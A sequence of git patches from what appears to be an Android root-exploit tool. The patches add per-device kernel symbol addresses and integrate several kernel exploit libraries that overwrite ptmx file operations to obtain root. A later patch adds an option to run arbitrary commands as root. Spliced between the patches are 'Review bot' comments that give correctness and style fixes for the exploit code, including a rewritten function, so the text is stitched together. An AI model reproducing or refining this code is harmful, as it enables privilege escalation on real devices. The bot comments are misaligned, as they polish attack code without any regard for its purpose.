From: cofface Date: Wed, 26 Jun 2013 10:26:44 +0800 Subject: [PATCH 033/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- mm.c | 1 + 1 file changed, 1 insertion(+) diff --git a/mm.c b/mm.c index 5d9ddd0..10d82d5 100644 --- a/mm.c +++ b/mm.c @@ -59,6 +59,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, { DEVICE_NEC_101T, 0xc013cccc } + { DEVICE_NEXUS_JZO54K, 0xc013509c }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 32d48d4a48efb1b9e3abdb86d99b8e7f448e4ee3 Mon Sep 17 00:00:00 2001 From: cofface Date: Wed, 26 Jun 2013 10:27:23 +0800 Subject: [PATCH 034/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- ptmx.c | 1 + 1 file changed, 1 insertion(+) diff --git a/ptmx.c b/ptmx.c index 569b611..6e20acd 100644 --- a/ptmx.c +++ b/ptmx.c @@ -74,6 +74,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 }, { DEVICE_NEXUS_JOP40C, 0xc08b5344 }, { DEVICE_NEC_101T, 0xc02c6da8 }, + { DEVICE_NEXUS_JZO54K, 0xc08b3224 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 96f1a7f54ca3ad66ecb0762a3c0b748353da84f4 Mon Sep 17 00:00:00 2001 From: cofface Date: Wed, 26 Jun 2013 10:27:57 +0800 Subject: [PATCH 035/125] add Galaxy Nexus jz054k add Galaxy Nexus jz054k --- cred.c | 1 + 1 file changed, 1 insertion(+) diff --git a/cred.c b/cred.c index d3a5ff5..ade7d92 100644 --- a/cred.c +++ b/cred.c @@ -73,6 +73,7 @@ static supported_device supported_devices[] = { { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } + { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From 5529e41412476197a9f9aa50bd0cb6787079b904 Mon Sep 17 00:00:00 2001 
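Review bot: The new entry `{ DEVICE_NEXUS_JZO54K, 0xc013509c },` in the mm.c hunk is appended after the context line `{ DEVICE_NEC_101T, 0xc013cccc }`, which carries no trailing comma, so the initializer list no longer compiles; that preceding entry has to become `{ DEVICE_NEC_101T, 0xc013cccc },` in the same change. The cred.c hunk of PATCH 035 on this line has the identical problem after `{ DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c }`. Ending every table with a trailing comma after the last initializer, as the ptmx.c table on this line already does, removes this hazard for future appends.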
From: fi01 Date: Wed, 26 Jun 2013 16:15:03 +0900 Subject: [PATCH 036/125] Add F05D (V08R31C and V11R40A) Add ISW11F (V25R45A and V27R47I) --- ptmx.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ptmx.c b/ptmx.c index 569b611..3236ca0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -7,6 +7,9 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { + { DEVICE_F05D_V08R31C, 0xc07bc164 }, + { DEVICE_F05D_V11R40A, 0xc07bbf44 }, + // F10D: Fujitsu added a method in struct file_operations { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, @@ -18,6 +21,8 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc10a5a48 }, { DEVICE_SC04E_MDI, 0xc1169808 }, { DEVICE_SC04E_MF1, 0xc1169848 }, + { DEVICE_ISW11F_V25R45A, 0xc080e268 }, + { DEVICE_ISW11F_V27R47I, 0xc080e028 }, // ISW13F: Fujitsu added a method in struct file_operations { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, From e80fc8407818c5ca1205ee8875ec9a99e0111a75 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 26 Jun 2013 16:26:55 +0900 Subject: [PATCH 037/125] Sync with submodules --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 07b7e55..a3a591e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 07b7e558c1dfbe67b093d5147971fa1dc820534f +Subproject commit a3a591ee3af25ca4875c7566752d5c66d24f17ae diff --git a/libperf_event_exploit b/libperf_event_exploit index d6854cd..5dd45d1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit d6854cd45911ac5e996c056df7a669d37ecfd135 +Subproject commit 5dd45d1f9e52a3b8d4a2ba6a36ddb84450d34660 From 6d7e989c5a579613d603a9583d7258c840465d83 Mon Sep 17 00:00:00 2001 
From: fi01 Date: Wed, 26 Jun 2013 18:15:33 +0900 Subject: [PATCH 038/125] Fixed compiling --- cred.c | 2 +- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- mm.c | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/cred.c b/cred.c index ade7d92..997e827 100644 --- a/cred.c +++ b/cred.c @@ -72,7 +72,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 }, { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 }, - { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c } + { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c }, { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 }, }; diff --git a/device_database b/device_database index a3a591e..fc3d39c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a3a591ee3af25ca4875c7566752d5c66d24f17ae +Subproject commit fc3d39cdb322d6f3b86b37eb9557923935a00159 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 76ee2e1..70332c2 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 76ee2e141bd75e54496adae3f01d39a82961123c +Subproject commit 70332c21f236e504ddf578657cba2d884b7f4135 diff --git a/libperf_event_exploit b/libperf_event_exploit index 5dd45d1..b4783b3 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 5dd45d1f9e52a3b8d4a2ba6a36ddb84450d34660 +Subproject commit b4783b3ab5ebba4e8619fef2daf528aaa11785b8 diff --git a/mm.c b/mm.c index 10d82d5..f5dd996 100644 --- a/mm.c +++ b/mm.c @@ -58,7 +58,7 @@ static supported_device supported_devices[] = { { DEVICE_N05E_A1000311, 0xc0105800 }, { DEVICE_NEXUS4_JDQ39, 0xc00f8114 }, { DEVICE_NEXUS_JOP40C, 0xc01350b0 }, - { DEVICE_NEC_101T, 0xc013cccc } + { DEVICE_NEC_101T, 0xc013cccc }, { DEVICE_NEXUS_JZO54K, 0xc013509c }, }; From 0b2f3d41d3d89e94420ad65120f0b1f04cffe25d Mon Sep 17 00:00:00 2001 
From: fi01 Date: Thu, 27 Jun 2013 11:15:40 +0900 Subject: [PATCH 039/125] Move all symbol addresses into device_database library --- cred.c | 83 +++--------------------------------------- device_database | 2 +- mm.c | 73 ++----------------------------------- ptmx.c | 97 ++----------------------------------------------- 4 files changed, 13 insertions(+), 242 deletions(-) diff --git a/cred.c b/cred.c index 997e827..604f289 100644 --- a/cred.c +++ b/cred.c 
@@ -15,87 +15,14 @@ #include "libperf_event_exploit/perf_event.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int prepare_kernel_cred_address; - unsigned long int commit_creds_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, - { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, - { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, - { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, - { DEVICE_SGP311_10_1_C_0_370, 0xc009363c, 0xc0093160 }, - { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, - { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc009ca34, 0xc009c558 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc00938a0, 0xc00933c4 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc00938b0, 0xc00933d4 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc009d500, 0xc009d024 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, - { DEVICE_SOL22_10_2_F_3_43, 0xc009d3f8, 0xc009cf1c }, - { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, - { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, - { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, - { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, - { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, - { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, - { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, - { DEVICE_ST27I_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, - { DEVICE_ST27A_6_2_A_1_100, 0xc00c314c, 0xc00c2d7c}, - { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { 
DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 },
- { DEVICE_C6602_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 },
- { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c },
- { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c },
- { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c },
- { DEVICE_C5303_12_0_A_1_257, 0xc009ec08, 0xc009e72c },
- { DEVICE_C5302_12_0_A_1_257, 0xc009ec08, 0xc009e72c },
- { DEVICE_M35H_12_0_A_1_257, 0xc009ec08, 0xc009e72c },
- { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
- { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
- { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
- { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c },
- { DEVICE_LT30P_9_1_A_1_142, 0xc0094878, 0xc009439c},
- { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 },
- { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 },
- { DEVICE_LT25I_9_1_A_1_140, 0xc0097f20, 0xc0097a44},
- { DEVICE_LT25I_9_1_A_1_142, 0xc0097dd8, 0xc00978fc},
- { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc },
- { DEVICE_NEXUS4_JDQ39, 0xc0089990, 0xc0089678 },
- { DEVICE_NEXUS_JOP40C, 0xc00cdef0, 0xc00cdbb8 },
- { DEVICE_NEC_101T, 0xc00fa134, 0xc00fa28c },
- { DEVICE_NEXUS_JZO54K, 0xc00cdee0, 0xc00cdba8 },
-};
-
-static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]);
-
 static bool get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) {
- int i;
- device_id_t device_id;
-
- device_id = detect_device();
- for (i = 0; i < n_supported_devices; i++) {
- if (supported_devices[i].device_id == device_id){
- if (prepare_kernel_cred_address) {
- *prepare_kernel_cred_address = (void*)supported_devices[i].prepare_kernel_cred_address;
- }
- if (commit_creds_address) {
- *commit_creds_address = (void*)supported_devices[i].commit_creds_address;
- }
- return true;
- }
+ *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
+ *commit_creds_address = 
(void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));
+
+ if (*prepare_kernel_cred_address && *commit_creds_address) {
+ return true;
 }
 print_reason_device_not_supported();
diff --git a/device_database b/device_database
index fc3d39c..43c4dd7 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit fc3d39cdb322d6f3b86b37eb9557923935a00159
+Subproject commit 43c4dd73163d70a4ec4b812280a4abad830d2ec8
diff --git a/mm.c b/mm.c
index f5dd996..b7db0e2 100644
--- a/mm.c
+++ b/mm.c
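Review bot: The rewritten body of `get_creds_functions_addresses` stores through `*prepare_kernel_cred_address` and `*commit_creds_address` unconditionally, whereas the removed loop guarded each store with `if (prepare_kernel_cred_address)` and `if (commit_creds_address)`; a caller that passes NULL for an output it does not need now faults inside this function. Looking the two values up into locals, testing them, and only then storing through the non-NULL pointers keeps the old contract; if the intent is that both pointers are now mandatory, that should instead be stated in the header next to the prototype. The two casts on the new lines also differ (`(void *)` versus `(void*)`); one form should be used. The lines after `print_reason_device_not_supported();` are outside the hunk.
```c
get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
{
  unsigned long int prepare_addr = device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
  unsigned long int commit_addr = device_get_symbol_address(DEVICE_SYMBOL(commit_creds));

  if (prepare_addr && commit_addr) {
    /* Keep the pre-refactor contract: either out-parameter may be NULL. */
    if (prepare_kernel_cred_address) {
      *prepare_kernel_cred_address = (void *)prepare_addr;
    }
    if (commit_creds_address) {
      *commit_creds_address = (void *)commit_addr;
    }
    return true;
  }
  /* … unchanged: print_reason_device_not_supported() and the failure path … */
```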
@@ -2,80 +2,13 @@ #include "mm.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int remap_pfn_range_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, - { DEVICE_SC01E_LJ3, 0xc0192124 }, - { DEVICE_SC04E_MDI, 0xc011383c }, - { DEVICE_SC04E_MF1, 0xc01138a4 }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, - { DEVICE_SGP311_10_1_C_0_370, 0xc01090fc }, - { DEVICE_SH04E_01_00_02, 0xc00e458c }, - { DEVICE_SH04E_01_00_03, 0xc00e46bc }, - { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc01124f4 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc0109360 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc0109370 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc0112fc0 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, - { DEVICE_SOL22_10_2_F_3_43, 0xc0112230 }, - { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, - { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, - { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, - { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, - { DEVICE_LG_E975_V10e, 0xc0116598 }, - { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, - { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, - { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, - { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, - { DEVICE_ST27I_6_2_A_1_100, 0xc01366ec}, - { DEVICE_ST27A_6_2_A_1_100, 0xc01366ec}, - { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C6602_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, - { DEVICE_C5303_12_0_A_1_257, 0xc011445c }, - { DEVICE_C5302_12_0_A_1_257, 0xc011445c }, - { DEVICE_M35H_12_0_A_1_257, 0xc011445c }, - { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, - { DEVICE_C6502_10_3_A_0_423, 
0xc0112668 },
- { DEVICE_C6506_10_3_A_0_423, 0xc0112668 },
- { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 },
- { DEVICE_LT30P_9_1_A_1_142, 0xc01096e4 },
- { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 },
- { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec },
- { DEVICE_LT25I_9_1_A_1_140, 0xc010dcfc},
- { DEVICE_LT25I_9_1_A_1_142, 0xc010dbb4},
- { DEVICE_N05E_A1000311, 0xc0105800 },
- { DEVICE_NEXUS4_JDQ39, 0xc00f8114 },
- { DEVICE_NEXUS_JOP40C, 0xc01350b0 },
- { DEVICE_NEC_101T, 0xc013cccc },
- { DEVICE_NEXUS_JZO54K, 0xc013509c },
-};
-
-static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]);
-
 unsigned long int _get_remap_pfn_range_address(void) {
- int i;
- device_id_t device_id;
-
- device_id = detect_device();
+ unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range));
- for (i = 0; i < n_supported_devices; i++) {
- if (supported_devices[i].device_id == device_id){
- return supported_devices[i].remap_pfn_range_address;
- }
+ if (address) {
+ return address;
 }
 print_reason_device_not_supported();
diff --git a/ptmx.c b/ptmx.c
index a86a138..ca79c4f 100644
--- a/ptmx.c
+++ b/ptmx.c
@@ -1,106 +1,17 @@ #include "ptmx.h" #include "device_database/device_database.h" -typedef struct _supported_device { - device_id_t device_id; - unsigned long int ptmx_fops_address; -} supported_device; - -static supported_device supported_devices[] = { - { DEVICE_F05D_V08R31C, 0xc07bc164 }, - { DEVICE_F05D_V11R40A, 0xc07bbf44 }, - - // F10D: Fujitsu added a method in struct file_operations - { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, - - { DEVICE_F11D_V24R40A, 0xc1056998 }, - { DEVICE_FJL21_V23R39X, 0xc0ee31f8 }, - { DEVICE_FJL21_V37R47A, 0xc0ee3378 }, - { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, - { DEVICE_SCL21_LJD, 0xc0c71dc0 }, - { DEVICE_SC01E_LJ3, 0xc10a5a48 }, - { DEVICE_SC04E_MDI, 0xc1169808 }, - { DEVICE_SC04E_MF1, 0xc1169848 }, - { DEVICE_ISW11F_V25R45A, 0xc080e268 }, - { DEVICE_ISW11F_V27R47I, 0xc080e028 }, - - // ISW13F: Fujitsu added a method in struct file_operations - { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, - - { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, - { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, - { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, - { DEVICE_SH04E_01_00_02, 0xc0eed190 }, - { DEVICE_SH04E_01_00_03, 0xc0eed190 }, - { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, - { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, - { DEVICE_SGP311_10_1_C_0_370, 0xc0d35ca8 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, - { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, - { DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, - { DEVICE_SO03E_10_1_E_0_269, 0xc0d36aa8 }, - { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, - { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, - { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, - { DEVICE_SOL21_9_0_F_0_226, 0xc0cffe78 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, - { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, - { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, - { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, - { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, - { DEVICE_LG_E975_V10e, 0xc0f9da70 }, - { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 
},
- { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 },
- { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 },
- { DEVICE_LT22I_6_2_A_1_100, 0xc09dbed8 },
- { DEVICE_ST27I_6_2_A_1_100, 0xc09b98e0},
- { DEVICE_ST27A_6_2_A_1_100, 0xc09b98e0},
- { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 },
- { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 },
- { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 },
- { DEVICE_C6602_10_1_1_A_1_253, 0xc0d37488 },
- { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 },
- { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 },
- { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 },
- { DEVICE_C5303_12_0_A_1_257, 0xc0e3b890 },
- { DEVICE_C5302_12_0_A_1_257, 0xc0e3b890 },
- { DEVICE_M35H_12_0_A_1_257, 0xc0e3b890 },
- { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 },
- { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 },
- { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 },
- { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00},
- { DEVICE_LT30P_9_1_A_1_142, 0xc0d02b00},
- { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 },
- { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 },
- { DEVICE_LT25I_9_1_A_1_140, 0xc0d032f8},
- { DEVICE_LT25I_9_1_A_1_142, 0xc0d032b8},
- { DEVICE_N05E_A1000311, 0xc0f58700 },
- { DEVICE_NEXUS4_JDQ39, 0xc0ef72f0 },
- { DEVICE_NEXUS_JOP40C, 0xc08b5344 },
- { DEVICE_NEC_101T, 0xc02c6da8 },
- { DEVICE_NEXUS_JZO54K, 0xc08b3224 },
-};
-
-static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]);
-
 unsigned long int get_ptmx_fops_address(void) {
- int i;
- device_id_t device_id;
-
- device_id = detect_device();
+ unsigned long int address;
- for (i = 0; i < n_supported_devices; i++) {
- if (supported_devices[i].device_id == device_id) {
- return supported_devices[i].ptmx_fops_address;
- }
+ address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));
+ if (address) {
+ return address;
 }
 if (kallsyms_exist()) {
- unsigned long int address;
-
 address = kallsyms_get_symbol_address("ptmx_fops");
 if (address) {
 return address;
From b1c58744f3224f8ecb8fc4cbd67fc174b53cfd37 Mon Sep 17 00:00:00 2001
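Review bot: In `get_ptmx_fops_address` the new `address` is declared on one line and assigned on the next, while the parallel rewrites of `_get_remap_pfn_range_address` in mm.c and `get_creds_functions_addresses` in cred.c in this same commit initialize at the point of declaration; `unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));` keeps the three sites uniform. Reusing `address` for the later `kallsyms_get_symbol_address("ptmx_fops")` lookup is fine, but a one-line comment such as `/* device database first, kallsyms as fallback */` above the first lookup would make the two-stage order explicit. The rest of the function after `return address;` lies outside the hunk.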
From: fi01 Date: Wed, 3 Jul 2013 10:50:38 +0900 Subject: [PATCH 040/125] Add library libfj_hdcp_exploit --- .gitmodules | 3 +++ Android.mk | 1 + device_database | 2 +- libfj_hdcp_exploit | 1 + main.c | 21 +++++++++++++++++++++ 5 files changed, 27 insertions(+), 1 deletion(-) create mode 160000 libfj_hdcp_exploit diff --git a/.gitmodules b/.gitmodules index 46c8151..41893e1 100644 --- a/.gitmodules +++ b/.gitmodules @@ -10,3 +10,6 @@ [submodule "libmsm_acdb_exploit"] path = libmsm_acdb_exploit url = git://github.com/fi01/libmsm_acdb_exploit.git +[submodule "libfj_hdcp_exploit"] + path = libfj_hdcp_exploit + url = git://github.com/fi01/libfj_hdcp_exploit.git diff --git a/Android.mk b/Android.mk index 63bd288..b00a387 100644 --- a/Android.mk +++ b/Android.mk @@ -16,6 +16,7 @@ LOCAL_STATIC_LIBRARIES := libdiagexploit LOCAL_STATIC_LIBRARIES += libdevice_database LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit +LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libcutils libc include $(BUILD_EXECUTABLE) diff --git a/device_database b/device_database index 43c4dd7..965a795 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 43c4dd73163d70a4ec4b812280a4abad830d2ec8 +Subproject commit 965a7952b67a8fb741e16eee8d75f23f4a8e9c3b diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit new file mode 160000 index 0000000..cb172ec --- /dev/null +++ b/libfj_hdcp_exploit @@ -0,0 +1 @@ +Subproject commit cb172ec96947c0f00033eb461a6718c6e6d7c2a6 diff --git a/main.c b/main.c index 440ec94..1ab452c 100644 --- a/main.c +++ b/main.c @@ -16,6 +16,7 @@ #include "libdiagexploit/diag.h" #include "libperf_event_exploit/perf_event.h" #include "libmsm_acdb_exploit/acdb.h" +#include "libfj_hdcp_exploit/fj_hdcp.h" void obtain_root_privilege(void) 
@@ -61,6 +62,20 @@ attempt_acdb_exploit(unsigned long int address, unsigned long int original_value
 return false;
 }
+static bool
+attempt_fj_hdcp_exploit(unsigned long int address, unsigned long int original_value)
+{
+ if (fj_hdcp_run_exploit(address, (int)&obtain_root_privilege,
+ run_obtain_root_privilege, NULL)) {
+
+ fj_hdcp_write_value_at_address(address, original_value);
+
+ return true;
+ }
+
+ return false;
+}
+
 static bool
 run_exploit(void)
 {
@@ -87,6 +102,12 @@ run_exploit(void)
 }
 printf("\n");
+ printf("Attempt fj_hdcp exploit...\n");
+ if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) {
+ return true;
+ }
+ printf("\n");
+
 return attempt_diag_exploit(ptmx_fsync_address);
 }
From ceaa681963d372ace5eca0fd3606c2bd5624e6f7 Mon Sep 17 00:00:00 2001
From: fi01
Date: Thu, 4 Jul 2013 13:18:53 +0900
Subject: [PATCH 041/125] Support command line option to run command as root
---
 device_database | 2 +-
 libperf_event_exploit | 2 +-
 main.c | 16 +++++++++++++++-
 3 files changed, 17 insertions(+), 3 deletions(-)
diff --git a/device_database b/device_database
index 965a795..d11c8ae 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 965a7952b67a8fb741e16eee8d75f23f4a8e9c3b
+Subproject commit d11c8aef7fd94d47dded59c0195d21cee2c797f3
diff --git a/libperf_event_exploit b/libperf_event_exploit
index b4783b3..b89b9cb 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit b4783b3ab5ebba4e8619fef2daf528aaa11785b8
+Subproject commit b89b9cb75df71c27aa09369fee6d92d906563502
diff --git a/main.c b/main.c
index 1ab452c..3aeb746 100644
--- a/main.c
+++ b/main.c
@@ -114,6 +114,16 @@ run_exploit(void)
 int
 main(int argc, char **argv)
 {
+ char* command = NULL;
+ int i;
+ for (i = 1; i < argc; i++) {
+ if (!strcmp(argv[i], "-c")) {
+ if (++i < argc) {
+ command = argv[i];
+ }
+ }
+ }
+
 set_kernel_phys_offset(0x200000);
 remap_pfn_range = get_remap_pfn_range_address();
 if (!remap_pfn_range) {
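Review bot: In the new option loop in `main`, a `-c` given as the last argument is silently ignored and `command` stays NULL, so the program falls through to the interactive `system("/system/bin/sh")` path of the next hunk instead of reporting the mistake; printing a short usage line and calling `exit(EXIT_FAILURE)` in that branch is clearer for scripted callers. Unrecognized arguments are likewise skipped without comment. `char* command = NULL;` departs from the pointer-binds-to-the-name style of the adjacent `char **argv`; `char *command = NULL;` matches. The body of `main` continues past the end of the hunk.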
@@ -133,7 +143,11 @@ main(int argc, char **argv)
 exit(EXIT_FAILURE);
 }
- system("/system/bin/sh");
+ if (command == NULL) {
+ system("/system/bin/sh");
+ } else {
+ execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
+ }
 exit(EXIT_SUCCESS);
 }
From ae093af5bf374a697c3634713f4ea8f04b19aa62 Mon Sep 17 00:00:00 2001
From: DooMLoRD
